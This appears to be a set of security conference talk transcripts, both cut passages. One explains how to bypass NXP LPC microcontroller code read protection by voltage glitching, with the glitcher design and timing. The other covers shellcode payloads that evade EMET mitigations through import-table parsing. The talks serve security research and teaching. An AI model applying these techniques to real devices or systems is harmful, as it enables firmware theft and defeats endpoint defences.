chip, that there is some good chance that we might be able to trigger it to read incorrectly. This is the memory map of one of the parts. This is for the LPC 1343 chip. The other members of the family are quite similar as far as the memory layout. Some blocks might be moved around. We can see that the flash starts at address 0, and they also list where the boot ROM is starting at address 1FFF0000, and they have a 16-k byte boot loader inside of this chip. Most of them have a very similar boot ROM. Some of the parts, like the LPC 2148, actually have a boot loader inside of a flash area at a different memory location, but in general, they're quite similar to this setup. So here are just some quick links for some useful tools for using the LPC chips. The first one at the top is the LPC 21 ISP. This is a nice, simple open-source software to program the LPC family microcontrollers from the command line. And then also, I've shown some links for various example codes to use the GCC ARM compiler to be able to write programs that will run on these chips. Another option is to use the official tool chain supported by NXP, but generally, that's going to be Windows compilers, and some of them you actually have to pay for to get the full feature set. So it's kind of nice to be able to work with GCC and have a more standard tool chain where everything is free and open. So to start out, we're going to want to see what they're actually doing inside of the boot ROM. So I write a very simple program that I can load inside of a blank LPC chip, and I put a function like this inside that simply sets up a pointer and start with the pointer pointing to the beginning of boot ROM, and then read one byte at a time and output them out the serial port. Because the example code that's available is quite nice and complete and supports a lot of the standard C library functions. We have even printf, so it makes it nice and simple and clean to be able to read the memory out of this chip. So using a function like this, we can load it into the chip and have it send us the contents of the boot ROM so that we can see exactly what it's doing inside the boot loader. So this is the beginning of the boot loader, the first code that executes after the chip is reset. This is a disassembly of a part of the code. So we can see that the very first thing that it does is it's going to check if the CRP level 1, 2, or 3 is set, and if they are set, then it will disable the debugging. Otherwise it will enable the debugging. So we can see what they do here is if the CRP 1, 2, or 3 are set, then they're writing the value 8.7654321 to the register at 400483F0, which isn't documented, but clearly this register is what enables or disables the debugging. So again, if they write the one specific value to this register, it will disable the debugging interface. If anything else is written to this register, then it will actually enable the debugging interface because the chip is considered unlocked. So in the first part here, they're setting up whether the debugging is enabled or not, and now we can continue on to the next piece. I've cut out just segments of the boot ROM to cut out the irrelevant part so that we're not looking at too much disassembly here. So what they will do next is they will look at the value in Flash that defines if the code read protection is set, and they're reading this value out of Flash, and they're storing it in a variable inside of RAM. And this disassembly, I've labeled this variable CRPValue in RAM. And then later on in the code, we can see that they start to do some comparisons to see what CRP level is set. In the middle segment of the disassembly here, they're checking if the CRP level 3 is set, or if the no ISP value is set, and if either of those are set, then it's going to jump into the application. Otherwise, it's going to check to see if we're holding a GPIO pin load to trigger the boot loader. And they're doing this comparison not directly against the value in Flash, but they compare against the variable that they've loaded into RAM already. In this screen here, this is a function that I call select boot loader. The boot code is going to end up in this routine if we don't have the no ISP or the CRP3 enabled, and if the boot loader has been triggered. So at this point, it's going to check to see if it should go into the USB boot loader or the serial boot loader. And again, we can see that they do the same thing where they're reading the value from Flash for the CRP, and they're storing it in, again, the same variable in RAM. So at this point, they have the CRP value if it's set, stored in their variable in RAM, and they're ready to enter the serial ISP software. So in the serial ISP routine, this is the very beginning of it, we can see that they set up some registers, and they're setting registers R6 and R7 here to be initialized with the values that would enable CRP level 2 or CRP level 3, and then they're continuing directly into their command loop where you can send the ISP commands via the serial interface. This is deeper into the ISP routine. This is after you've sent it a command, and it is going to check the command to see if it's on the list of commands that would be disabled if code read protection is set. So we can see that right from the very top, I've started where if it's a command such as a read or a write to Flash, then it will set register R2 to 1, which indicates later in the program that this is a command that would be disabled by CRP, and then they're going to continue and they're going to check to see which CRP value is actually set. Now if we look here, we can see that they're actually doing the CRP check against this variable that they have in RAM at this point. So inside of the serial bootloader, when they want to know is this command allowed, they're always comparing the CRP value, the lock value, against this value that they've already loaded into their variable in RAM. So at this point, they're not even looking into the Flash anymore to see if it's locked. They've loaded this value after reset, and now they're able to just check in RAM every time. So to continue from here, I am ready to start testing on the chips. So I took a variety of chips from the family and I mounted them on different breadboards. So this is one of the smaller members of the LPC family. This is an LPC 812 on a breakout board. This is another smaller member of the family. This is the LPC 1114. This is the LPC 1751, and you can see I've only populated some pins on the breakout board. This is because really I only need to power the chip to enter the bootloader mode and to have the serial access. I'm not interested in so many of the other peripherals, so I try to keep it simple. This is an LPC 2101, another member of the family. And this is an LPC 2148 on a nicer breakout board that I found with the ZIF socket. That's a lot more convenient to work with if you're going to be changing between a lot of different chips. And then another option is also to use a pre-made development board. This is an AlieMax board for the LPC 1343 chip. This one has been modified a little bit. I've removed two of the capacitors, capacitors C1 and C4. These are the filter capacitors on the VDD pins because I'm planning to glitch this chip and that's going to involve quickly dropping out the power supply, so I don't want those filter capacitors. They're going to be trouble for me. Also I've cut two traces on the board, which are for the VDD and VDD IO signals. This development board is set up nicely that they give you a spot specifically to cut if you want to disable the power supply from the board. So I've installed jumpers on those locations so I can connect with my own power connection. And then also I've added this green wire and this green wire is just connected between the ground pin on the debug port and the VBUS signal going into the chip because normally this development board is designed so that you'll be using the USB boot loader. So in order to disable the USB boot loader, I've added this green wire which is simply holding VBUS pin low, so we'll enter the serial boot loader instead. So this is my basic setup that I use for glitching chips. At the top I have an oscilloscope that I use so that I can actually see a little bit of what's going on. Below that I have a power supply, a dual output adjustable power supply so I can set two voltage levels independently. In front of that I have a little mess of wires and development boards with an Atmel X Mega board that I use for controlling my glitch and for doing the serial connection to the chip. I have one of the LPC boards on a breakout board. I have another small breadboard with the actual glitcher circuit that will get into it more in depth in a few more slides. And then I have the oscilloscope probes connecting. In the background I have the computer that it's connected to. On my computer I'm just running Minicom, I have just a direct serial interface to the X Mega board that I'm going to be using and I run a little terminal program within the X Mega and this is my interface for the glitcher. So to have a bit of an idea of what's going on inside of the chip during boot up I do some simple power analysis on this chip. To do a power analysis I connect a 10 ohm resistor in series with the ground signal going to the chip. These measurements are from an LPC 812 chip and again as I noted it's simply a 10 ohm resistor in series with ground and I measure the voltage across this resistor. So as the power consumption of the chip is changing you see a difference in the voltage measured across this resistor and then on the oscilloscope we can get these traces which look quite noisy but still we can see that there's some pattern to it. The image at the top left is showing immediately after resetting the chip and entering into the application and then the image at the bottom right is showing when we reset the chip and it enters into the boot loader. So we can see that the left half of the image is quite similar between the two of them and then around the middle of the oscilloscope image we start to see that there's some differences in there. We can't see exactly which instructions are being executed but we can clearly see that there is some difference in the code path that's being taken. So this is a measurement of the same thing. Again it's the reset and starting the application comparing to reset and starting the boot loader. I've marked with cursors on the on the scope here so we can see with the yellow lines the exact point at which the code flow starts to differ. So we can gather from this that the part between the two yellow cursors at the left of the image this is the boot ROM code, the initialization and the initial checking of the code read protection and then everything to the right of the cursor differs depending on whether we've triggered the boot loader mode or whether it's going directly into the application. So this is a video showing the live image from the oscilloscope. Right now it's starting into the boot loader mode. It was in the application mode. This isn't going into the boot loader mode. Now it's switching back to the application mode. So even though it's noisy and it jumps around you can see some different patterns as it switches between the boot loader and application mode. So even with these dirty signals we're not going to get all of the detail that we might really want but it's definitely enough to be able to see if the code flow is taking the path that we expect or if it's going in some different direction. This is showing on another chip. This is looking at the LPC 1343. So the very top trace I'm measuring the power consumption using a resistor in series with the VDD pins and then near the bottom I'm measuring the power supply with the resistor in series with the ground pins. So you can do the power analysis on the VDD or on the ground. Generally you'll get a nicer cleaner signal measuring off the ground. I mean we can see some differences in this image on either trace whether we're looking at the VDD or the ground but clearly the bottom tracer with the ground is much easier to actually see some differences in what's going on as we trigger between the boot loader and the application mode. So to get into glitching my glitcher is based entirely around this chip. This is a Max 4619 chip. This is almost the entire glitching circuit right here in this one chip. The Max 4619 is a chip that contains three single pole double throw switches with a fast switching time and a low series resistance when they're switched on. So what this means is that we're able to switch between two inputs and that will adjust the output level and we have switching times that are as low as 10 to 15 nanoseconds. So this means that we can very quickly switch between two voltage sources and this is how we'll actually produce the glitch output. So this is a diagram again from the Max 4619 datasheet just showing the actual circuit inside the Max 4619 and you can see it's quite simple. It really is just three switches inside. So we have three inputs, Y0, Y1, X0, X1, Z0, Z1 and then the three outputs are the X, Y and Z outputs and the controls for these switches which selects the zero input or the one input are A, B and C. There's also an enable pin which if you hold it low then the Max 4619 will output voltage to the chip. If we release that high then it won't have any output to the chip at all so we can actually use this to be able to completely cut off the power supply to the chip. So this is the schematic of the glitcher circuit that I use. All that I've done here is I tie the three switches in the chip together in parallel. So I do this, it helps to lower the effective resistance that we see through the chip so it has a little bit less effect on the voltage level itself. They'll still switch together very fast. I only actually need one switch because I'm only switching one thing, only the VDD towards the chip. So I've tied the Y1, Z1, X1 signals together and I've tied the Y0, Z0, X0 signals together the same with the control signals A, B, C. So the outputs from X, Y and Z1, sorry the inputs to X, Y and Z1 are coming from my power supply and those will be the glitch voltage level that I set while the input 0 is the normal power supply level that I set. And then the outputs X, Y and Z are the output actually going to the target chip. So to control this I just need two signals, I'm running these to my Atmel XMega development board that I use. So the enable pin, I run to the XMega port A3 which allows me to enable or disable the output to the chip entirely. And then the control pins A, B, C, I'm running to another XMega port A0 and this is how I'm going to switch between the normal and the glitch voltage levels. So this is the actual circuit with the Max4619. This is basically the whole glitcher board minus the XMega that I use as the microcontroller. I like the solderless breadboards, they're very convenient to work on, they allow you to change your ideas very quickly and test different things out. Any problems with high frequency noise or anything like that, really for most of the projects that I do I don't notice too much of a problem with it, I'm able to ignore it and kind of do things the cheap and easy way. So I enjoy that I'm able to just pop a chip into the breadboard, connect these wires and in a few minutes I've built a glitcher like this. So this is a picture of an LPC812 chip connected to the glitcher. As you can see I'm very careful always with my wiring, keep everything nice and neat. But really as I said the noise and things that you see in most cases it's only a minor annoyance and everything's actually still going to work. So I like this quick and dirty method of working. This is another angle of the same glitcher setup, again showing off the nice clean wiring that I tend to do. So here I have everything labeled, the blue development board is an XMega A1 explained board, this has an Atmel XMega chip which is an AVR that runs at 32 MHz. Then below that on the black breadboard I have the Max4619 Glitter circuit. You can see that I have a 10 ohm resistor that I put in series with the ground going to the LPC812. That's how I'm doing the power analysis. So I simply put that in series with ground and I connect the oscilloscope probe to the side of the resistor that the LPC chip is connected to and that's going to be my power analysis signal. And then at the top right you can see that there's the LPC812 that I've mounted on a breadboard for testing. For the power supply to control the VDD levels to this chip I use a benchtop power supply so it has two outputs. The first output I can set the normal VDD level that the chip will run at and then I'm going to use the second output and that's how I'm going to adjust the level of the voltage drop while I actually perform a glitch on the chip. There's lots of different options actually for supplying power to the chip or you could build a circuit and be able to have it digitally controllable. Personally I like the hands-on method of having a benchtop power supply like this. It lets me quickly connect different things and test different ideas if I want and I find it a very nice way to work to actually be able to adjust the knobs and see the difference in the output and it's nice and quick and easy just to connect everything together. So this shows the development board together with the breadboard with the glitcher circuit. So this is essentially the whole glitcher circuit minus the target board with the LPC chip and without the power supply. So at the very top we can see where the inputs from the adjustable power supply will come from. So the white wire is going to be ground from the power supply. The red wire is the normal voltage level and the green wire is the second voltage level that we'll use for the glitch. Then we have the VDD and ground output towards the target chip and then other than this we'll also have the serial port, the UART connected between the LPC chip and the explained development board. But as far as the glitching circuit goes this is the entire system right here. That's very dark. So I don't know how well you can see this because of the colors that I have but this is the C and December code that I run inside of the XMega chip to actually control the glitching. So the basic concept is that I use the out instruction on the AVR chip. So the out instruction is a single cycle opcode. So this means that if we're going to execute a series of out instructions we can actually change the output signal on the port at every clock cycle at 32 MHz. So that means that we could actually trigger a glitch that would have a length as low as 31.25 nanoseconds. It'll be a little bit different than that actually because of the switch on and off time within the Max4619. But generally speaking it can do quite short glitches. So what I'm doing here is I have a series of out instructions that will set the level on this output pin. And before I call my glitch function I set up some variables to define what kind of a glitch waveform that I want. So I can have it anywhere from one cycle at 32 MHz up to eight clock cycles at 32 MHz and it can be changed very easily within software and I don't have to have a separate routine for each different length of glitch. So this lets me kind of change things on the fly and still have the flexibility to have these very short glitches. So to start trying to glitch the chip the easiest way is if I'm able to execute a glitch against code that I know exactly what the code is doing and since these are common micro controllers I can buy a blank chip and I can load my own code inside. So using the GCC arm tool chain I write some simple C code. So what I have here is a while loop that will continue executing forever and I have two variables that I'll use inside of this loop A and B. And so I'll initialize B to a value that I have set as number of glitch loops which in the case of this test I actually have set to 16. I will toggle some GPIO pins. This allows me to have nice synchronization between the LPC chip and the AVR chip that will do glitching so that I have my timing nice and precise. And then I have in the middle a for loop. So this for loop is going to increment the A variable from zero until it reaches the total number of glitch loops we want to do. And during this loop it's going to decrement the B register. So what this does is normally at the end of the loop we should know that the A variable is going to end up being 16 because that's how I have the num glitch loops defined and the B variable should always be zero. At the end of this while loop then I am checking to see are the A and the B values actually what I expect. If the code is operating normally then the first condition will be true. A equals number of glitch loops and B equals zero. In this case I am printing out the serial port just a dot. This indicates that there was no glitch that the code operated normally. But if this check of the A and the B variables fails that they have a different value then I am going to print out the serial port what those values were and that indicates that some kind of a glitch actually occurred that the code did not execute normally like it would. So I wrote this test code in C so we can actually look at the assembler code that would be generated by GCC to see exactly what instructions are going to be executed that we are going to try to glitch. Another option would have been to write the code directly in assembler but it's such a simple test program and the idea is only to see if it has an effect so I prefer to work in C. It's a nice, easy, convenient way to work. It's a little bit nicer than having to write an assembler for everything. But we can see that what the compiler did here is really quite simple except for all the extra noise from the listing. That basically it starts with A equals zero. It decrements B, it increments A and it checks to see if we have hit the end of the number of glitch loops yet. So this video is showing what I see through Minicom when I'm running the test code. So all these dots mean that no glitch has happened. So I'm waiting for this for loop to start and then I'll do a quick glitch and as this is running I'm adjusting the voltage level on the power supply. So we can see when I start to lower the voltage on the power supply we start to see some strange responses come out of the chip. So all of these lines showing what A and B are are indicating that a glitch occurred. The X's that come up that indicates that the chip reset and we can see a bunch of X's come up there at once as I've dropped the voltage level even lower. So because I start to see a lot of resets with the voltage level so low at that point I increase the voltage level a little bit and what I'm doing here is trying to find kind of the sweet spot where the chip runs and it still has the most strange effects coming when I glitch inside this for loop. So we can see that normally the value at A should be X10 and the value in B should be zero but we ought all kinds of different values depending on exactly which instruction that we glitched within the loop. We have lots of results that are like A is 5003, 009. This will be because A is actually pointing to the location within RAM where that variable was stored. So because it wasn't just a loop where it was incrementing registers it would actually have variables in RAM so we ended up with a pointer instead of the actual value there because of where the glitch broke the loop. But we have a variety of different effects but the main point here is just that we're having some effect on the chip. The code isn't operating normally. All that I'm doing at this point is dropping the VDD supply to the chip very briefly during that loop. So by doing this kind of a test this lets me have a nice area to target where I can kind of tune things in and find what length of a glitch and what voltage levels will actually most likely have a good effect on the chip. So this is showing the oscilloscope image along with the mini-com screenshot showing of actually glitching during this target loop. So the top channel is our power analysis channel. The middle channel there is showing a GPIO pin. It's pulling the GPIO low while it's within our for loop that we're targeting. And the bottom line there was just reset so it's always high during this. So we can see it's attempting to glitch and it's attempting to glitch and then finally it stops and we can see that when the glitch actually had an effect our loop got much shorter. We can see because the GPIO was held lower for less time and on the bottom window there we can see that we ended up with the value A being 5003,0008. So again it was set to the pointer value not the actual value of the variable. And we can see that the B variable ended up with hex E. So B would have started out with hex 10 and it got decimated twice to F and then to E and then at that point we broke out of the loop. So the loop is shorter and the B variable matches the length of the loop because it didn't count down all the way. This is showing several screenshots of glitching and seeing different effects out of the chip. So at the top left we have a screenshot of when we did the glitch but it didn't actually have any effect. So the ending result in variable A was hex 10 and B was zero. Below that we can see that the glitch had an effect. A ended up with the normal value but B ended up with the value FF, FF, FF, F1. So what has actually happened here is we can see that the loop was extended a little bit and so the B variable actually got decimated more times than normal so it ended up with the wrong value. At the top right we can see again that the loop broke early. We have A being set to a pointer value and then we have B set to hex E instead of being decimated all the way down to zero. And at the bottom right we have another result that comes up and again it's similar to the one at the bottom left but in this case B was decimated down to FF, FF, FF, F2 instead. So now if we adjust the glitch to hit at a different part of the loop I've changed the timing so I'm waiting a few more clock cycles before I glitch. Here it has an effect again so we can see that the loop was shortened because of the glitch. We broke out of this for loop and we can see again that the variable A is set to this pointer value it tends to get left at and the variable B is now set to hex A. So the variable D got decimated a few more times because we waited further through the for loop to glitch. And here we have screenshots showing the different results that we have when we glitch at this timing location versus the first one so we've waited through a couple more rounds of the for loop. Now something else that we can notice in these images if you look especially at the top left image you can see when the for loop executes and we can see a little pattern there and that pattern we see repeating exactly 16 times. So from the power analysis we don't necessarily know what instructions execute but it really is very clear that there's a for loop that's executing exactly 16 times and if we compare to the bottom left image then you see that it hasn't executed 16 times. You see it executes about five times and then we have the glitch the big spike on the power consumption and then it completes one more loop and then it exits. So using this power analysis is very nice to have a much better idea of what's going on inside of the chip. It doesn't tell you everything but you can really get a lot of clues out of it. So now this is showing a video of from reset. We can see the channel four there the bottom one in the oscilloscope is the reset signal so from the rising edge of reset is where we're starting to trigger and then the top trace again is the power analysis and as it begins here it's entering into the application mode and we're not able to enter the boot loader mode because we have the no ISP set but by glitching near the location where previously we saw the difference between entering boot loader or entering application we can actually glitch at this spot and we're able to see very clearly on the power analysis that instead of going into the application like it is now when the glitch finally hits and lands the following trace on the power analysis is showing that we're going into the boot loader instead. We can verify this by sending a command to the chip and it does actually respond to the boot loader. So after we've done this in my very simple X mega code what I've done is instead of implementing the entire ISP code myself I simply do a serial port pass through so I run this process I glitch I'm able to enter the boot loader even though it's been disabled and then after this step I can drop back to the command line and I can use one of the commonly available tools this is now able to read the flash out of an LPC 1343 chip so it reads it through the normal ISP interface because as far as it's concerned this is an unlocked chip we can see the flash contents and it really is just that simple. We've been able to identify the locations in the boot ROM startup where it's checking the code read protection values and where it's checking if it's allowed to access the boot loader. We perform a glitch at that location it's able to corrupt the code flow but the chip still operates other than a few corrupted instructions so we've entered the boot loader once we've entered the boot loader then we can drop back to any of the LPC programming tools and it's able to read the chip normally as if it was an entirely unlocked chip. So I've uploaded my test code for the Glitcher to GitHub it's not exactly production ready code but it's what I used it does mostly work it's not well documented but I guess that's kind of normal. So this is code for the explain development board the AVR chip and this has my serial interface code and also all the timing code for the glitches to control the max 4619 and perform our glitching. Yeah so if you're interested you can take a look there hopefully as time goes on I might actually clean it up a little bit and document it a bit better so it'll be a little bit more usable. It's very much a prototype at this point still but as you can see it does work for actually glitching the chip. Something interesting that I saw while I was working on this is that there's an application note from NXP application note 10866 this is for a secondary USB boot loader they do have some chips that have the USB peripheral but they didn't include USB boot loader in their boot ROM so they've provided this application note explaining how you can make your own USB boot loader and it also supports the familiar code read protection levels. What's interesting about this one though is that they only allow read out through this version of the boot loader if the code read protection word is actually set to one specific value that they've defined as no CRP. So we can see here that they've actually made their application note their suggestion for the user boot loader is implemented in a more secure way than their actual ROM boot loader. There's about 4.2 billion fewer possibilities to corrupt the CRP value and actually allow the read out in this case. So clearly somebody is aware that there's some issues with the code read protection but there's not so much that they can do inside the ROM boot loader. Now also another thing that I looked at on this chip was looking closely at the power analysis during startup so I have two oscilloscope screen shots here the first one is showing the startup with no CRP set so there's no read protection enabled and then the second one is showing if I have the code read protection level one enabled. So if I kind of flip back and forth between them you can see that they look almost identical except for the CRP one just past the halfway point there's a little pulse there that's a little bit longer. So we can see there's a slight difference in the code flow between no CRP or CRP level one being set and then if we go back and we look at our disassembly of the boot ROM we can actually see that directly in the startup this is where they're checking if they have the CRP level one set to know if they can enable the debugging interface or not. So we can see from these oscilloscope images exactly where this piece of code is being executed and I didn't actually test this but I expect that this might actually be an even easier target than the serial boot loader to try and unlock the chip because if you can corrupt this value that's being written to the undocumented register 400483F0 then your debugging interface should be enabled so rather than having to deal with the serial boot loader at all you could just plug in the JTAG debugger and read out the flash directly from this. Again it's clear from the code that if any other value besides 8.7654321 ends up being written to this register you're going to have a wide open debugging port. So being able to see this code flow difference in the power analysis is quite nice because it gives us an indication exactly when we need to glitch within a few clock cycles. So I took a look also just at the chips directly I did a quick decap of the chips this is an LPC 2148 chip it's one of the older series of LPC chips this one contains the flash boot loader not the ROM boot loader but generally they're all still quite similar they're all the 32-bit ARM chips. In the corner of the chip we have the part number logo for the chip so again this is the LPC 2148. Just for comparison now this is one of the newer series the LPC 1343 we have again a nice logo and a part number in the corner very easy to identify the chip in another corner we have a nice little piece of artwork here. So looking more towards the middle of the chip where we have the actual circuitry this is from the LPC 2148 and we can see that the circuitry is quite dense so for an invasive attack with probing I'm sure it can be possible but it would need fairly advanced equipment it's going to be tough just to put a needle directly down on top of a chip like this. Also we can see a lot of these sort of rectangular pieces of metal there because any of the metal any of the areas on the top layer that don't have metal they filled in with filler to keep the chip well planarized. So areas on the top layer of the chip that are empty are covered with metal like this so we have actually not much access to the bottom of the chip without further deprocessing and when it glitches possible there's not really much reason to actually do an invasive attack but because it's so covered in metal this does make it more difficult if you want to do a laser attack or anything like this I mean maybe it can still be possible but it's a lot harder to do that kind of thing when you don't actually have access to the transistors below. So yeah this is quite dense this is the 2148 and the newer chips are even smaller so from an invasive perspective it's a little bit difficult to work on this chip unless you have high end equipment but the glitching works great so the non-invasive attack is definitely the way to go. These chips are quite easy to get to glitch and because you can read out the boot ROM so easily and it's set up in such a simple way it's a nice target and it's quite easy to unprotect these chips. So that's about all that I have I hope that I've been able to show how easy it is to build a simple glitcher to set it up. You can get a lot more advanced than this personally I like to do it the simple easy cheap way and it works good enough. You can get more precise with your glitch timing and with different glitch waveforms and all of this kind of thing but I mean in this case all you need is a 1max4619 and a power supply and you can find that you can have an effect on the chip very quickly and then it's just a matter of finding your target location which again with the power analysis makes it very easy and the code is quite simple. So the bottom line is don't trust the code read protection too much on these chips but it's not really too specific to the NXP LPC family. Generally a lot of the basic microcontrollers are set up in similar ways the locks tend to be quite fragile so I'm not really intending to pick too much on this family of chips this is just a nice example to work with. Most of the simple microcontrollers that have a boot ROM with a boot loader inside will have similar defects to this that if you're able to find a way to glitch the chip then probably you can bypass it in the same way. Hi I would like to ask do you provide the clock from the Glitzer circuits to the MCU as well or is it running from an internal RC oscillator? Yes that's something that I glossed over for sure. These chips are generally running from the internal RC oscillator. Some of the family do need an external clock the LPC 2148 for example runs off an external clock. In general the whole family does support the external clock but during the boot ROM it's running off of the internal clock. So for my testing I didn't even supply a clock signal to it because it had no effect at the time of the program that I was looking at. The LPC 2148 when I worked on that one something that I did find that was worth noting was that the development board that I was using had a 12 megahertz oscillator on it which I was able to still glitch the chip but when I increase the oscillator speed to 16 megahertz the chip becomes much more easy to glitch. So if you have the ability to run from the external oscillator then if you increase it to kind of the highest level that you can the chips tend to get easier to glitch but I mean unfortunately for me in this case most of these chips were running from the internal RC oscillator. I have one additional question. Have you tried using the chip whisper? I haven't used the chip whisper. I've heard that it's a good tool but I haven't actually had a chance to get any hands on experience with it. Okay, thank you. Thanks. Hello. Very nice presentation. Thank you especially because it's quite low cost to do this type of attack. I have two kind of related questions. The first one is how long was the glitch campaign when you were searching for the characteristics of the glitch? And the second one, once you find this characteristics of the glitch, what's the success percentage of repeating the attack? So to find the glitch initially on this one I was fairly lucky. I mean this isn't the first chip that I've tried to glitch so I sort of have the strategy that I follow and by loading my test code inside with this for loop that I can target it gives you a nice targeted area where you have a defined effect if you're able to have an effect. So I think within the first day of playing with this chip I was able to see some effects from the glitching and then it took a little bit longer to actually find the precise points to glitch to access the boot loader. But it was fairly quick that I was able to do that. And then the repeatability, so the glitch doesn't necessarily work every time. But if you only need to do one glitch in the program to get to the point where you want and you can try many times then it's not so bad. So I mean in this case I'm having a glitch success rate of maybe 1% but I can make more than 100 attempts in a second so I'm still having success within a second or two. Okay, thank you. This talk focused on a glitch to break out of some kind of loop or bypass a conditional and your previous talk at CCC and in recon last year had you glitching to change like a branch target so you were jumping into a payload in memory. Are you, do you see that certain architectures or certain processor families are more susceptible to certain types of glitches or that you can characterize like what's actually happening in there based on some criteria? On most of the chips that I've looked at I haven't done so much characterization. Typically I'm just looking for something that's going to corrupt an instruction and the exact details I'm not so worried about as long as it doesn't corrupt too much. Depending on the architecture it does make a difference. If you're using a chip with a Harvard architecture where your data memory and your code memory aren't shared then that can make some types of attacks more difficult. In this case it doesn't really matter because it's such a simple target but as you mentioned for my previous talk I wanted to actually put a code payload in and have that executed so if that chip had been a Harvard architecture that would have been a lot more difficult to actually get that into an executable area. You can see different effects depending on the type of the chip. So on a risk chip your instructions are going to generally be all the same length so you're going to have most likely some effect on this instruction and then the rest of the code is going to execute normally. If you're on a SysC chip where the op codes are different lengths then you can have an effect where you might cause your op code to be read as an incorrect op code in which case it's going to end up executing from the middle of the next instruction. So in this case you can have a more wildly different code flow. Thank you. Okay.
|
A look at bypassing the Code Read Protection in the NXP LPC family of ARM microcontrollers. This is an example of one of the simple security features found in common microcontrollers, and how it is easily bypassed. The Code Read Protection (CRP) is implemented in bootloader software and can be easily read and disassembled, showing the fragility of the CRP mechanism. This talk describes the path to exploiting the bootloader software, developing and using a simple glitcher. A glitcher is designed, the chip is tested for vulnerability to glitch, and an attack is formulated to disable CRP and enable readout of FLASH contents. As glitch attacks go, this is a simple and ‘beginner-level’ attack which should be easily reproducible. The talk will include hardware and software design, including schematics and source code, for a glitcher able to bypass CRP.
|
10.5446/32393 (DOI)
|
So, why this talk? I think writing show code is fun. I've been doing it for a number of years now. And I think it's time to update some of the publicly available show code ideas that we have out there. And so there's basically two parts of this talk. There's a background, and then we're going to go into some of the actual more fun topics. So, today I'm going to be targeting Stephen Führer's hash API. It's either called the hash API, a menace plate payload hash. Does anybody, who knows what that is out there? Anybody? Hands? Couple hands? Okay. So, it uses a four byte hash, basically a 13 bit raw instruction or simply rotate. And it has roots that go back to 2003 from Scape's understanding window show code paper. And it's really compact, really efficient. It's actually really awesome because it parses the export table, and it works like this. Let me just go ahead and explain it to you. So what it does is it does a call over the actual hash API. It goes into the actual payload logic. And then there's a very strict API how this works. It will pop the return address into EVP. And so it will push everything for x86. It will push everything onto the stack. And then it will make a call to EVP. So it goes into the hash API itself. Then it's going to parse the export address table and jump into the Windows API. And then it will return back to the payload logic. And it will continue until there's no more payload logic. And you have done whatever you wanted to do. So, how do you, there have been some defeats. Now, remember, I don't know if I mentioned it, but the hash API came out in August 2009. Okay. So just keep that in mind. You can defeat the hash API with Emmet. I mean, there's many, many mitigations in Emmet, right? And if you can get to the payload, you have to bypass a number of things. There's going to be a couple things to stop you, and we're going to go into that. There's also a Pyotr Bannani. I butcher names. That's my job. But this frack article is great because it talks about hash collisions. And there was actually a tool that came out called halting attacks via obstructing configurations. And it was a DARPA fast track tool that was made by digital operatives. And what it does, it will inject a DLL in the first loaded modules list. And it will contain all pre-computed collisions so that once you start to walk in the export table, you would crash instead of getting successful exploitation. And then there's control flow guard, return flow guard. And we're not really going to talk about that in this talk because it's a different beast. So specifically, I think AF, more than Collar, were introduced to stop the hash API call. If you see here, it was introduced in 2010, like very quickly after. And it basically stops the reading of the export table via hardware breakpoints. And it's pretty cool. It worked pretty well for a couple of years. But then they added in 2014 the plus and that includes kernel base. So the Collar, that was introduced in 2013. And what that does, it blocks any returns or jumps directly into a Windows API. So it's more of an anti-ROP. But if you remember when I quickly explained how the hash API works, it does a jump from the hash API into the payload. So these two protections actually mitigate against the hash API itself because of it does a jump into the Windows API. So technically, EMET, or EMET, I pronounce it two different ways, however I'm feeling, it is considered end of life. It is going to end July 31st, 2018. But it still works. And you can see, I say, it depends on your threat model because this is the recent Tor browser exploit versus EMET. So if some of these people that were doing the things that they shouldn't have been doing had EMET, they wouldn't even gotten to the payload because this is a stack pivot mitigation. So they were using stack pivot to get to the payload. And so if they had a better payload or paid more for the payload, they wouldn't have this issue, right? So EMET does still work. And it's kind of the case where it's like the iPhone in your pocket because it's easy to implement versus control flow guard where developers have to compile it in. I think Edge is the only browser that has it right now. So how do you, there's been several bypasses for EMET, EAF plus. And a skyline on his Sky for Blog. I had to actually go to archive.org because the blog is no longer up and I'm sad. It was a great blog. And he described a ret to libc style bypass using NTDLL. And I believe it was hard coded addresses. And my slides are going to be available and the links are in there if you want to check it out. And then there's Peter. He also had a blog post on erasing the hardware break points and using NT continue. And it would, you know, no more hardware break points, no more export address filtering. And then offensive security had a very similar bypass and they would, there was an EMET function that would call a ZW set context thread which would also zero the hardware break points. So and the caller check is much easier. Jared Demont in 2014, he, he just, all he had to do, if you get the address to load library A, you just move it into a register and then dereference it back into the register and you can call it directly. So pretty easy. Now after reading Jared's paper, I decided to put this into BDF itself and back to our factory. So I made some import address table payloads that would use the actual thunks that were in the import table directly. And this bypassed the EMET and the EAF and caller checks. And later on I actually added patching of the import address table so that I could add whatever APIs I wanted at any time. But, you know, this wasn't everything I wanted to do because I wanted to actually do some position independent import address table payloads to see what would happen. So this was, you know, fast forward December 2014. So I do some research, I'm looking around, you know, what's been done prior work. And so Skate, Matt Miller, I think he might be on the EMET team, I'm not sure. I know he works at Microsoft on the mitigation work, but he had in his paper, he talked about parsing the import address table, not import address table, export address table, and loading a DLL, getting a load library, loading a DLL so that you had everything you needed in that one DLL like WS232. And you could just call the APIs directly in that DLL. There were a couple of issues with it if you look at it from an EMET perspective because you had to parse the export address table. So that was kind of a non-starter. And then there was a PTR, PTR, I mean this guy has done a lot of work, it's pretty amazing. Same frack article, he talks about import address table parser, and that was enough to get me started. And here's the actual code, and I don't know what operating system it was for, I think it might have been XP Service Pack 1 or 2, but it got my head going where I can understand what I wanted to do. So I wrote my own stub and basically what it does, it finds PB, P header, import table RVA, and then loops through and finds kernel 32, but it used ANSI string matching, right? And then you go on to the next slide. I add, next I'll go through and find load library and get process address, but what I added at the top is a set bounce check because once you're, if you're looping through the import table, sometimes the memory address where you're going to read is out of bounds. And so I added a FF00000 check to make sure that I did not go out of bounds. So this actually worked pretty good. It was very stable. And so I bolted on a reverse TCP shell and I bypassed caller EAF checks and the POCs that I was running. And so then I was like, oh, this is cool, I'll email the EMET team. And this was their response, pretty much. So apparently they knew about import table parsers. I mean, they get millions of crash dumps in month, I'm sure. So they had to know, right? And so my POC was limited just to load library and get process address in the import table of the main module. So I didn't do anything really exciting. So this was December 2014 and I just put it on a file system and just let us sit there. Just kind of went back to real life and work. And I'll just look at it Twitter. And Casey Smith does a lot of, he executes code in places that you're not expecting it. They're like sign binaries like MS build and stuff like that. So he bypasses white listing solutions. I see him talking about EAF mitigations getting flagged in Excel and I knew exactly what his problem was. So I send him my import address table stuff and we started to collaborate. And the slides are going to be out today and there's a link there. You can go see when I release the code to him. 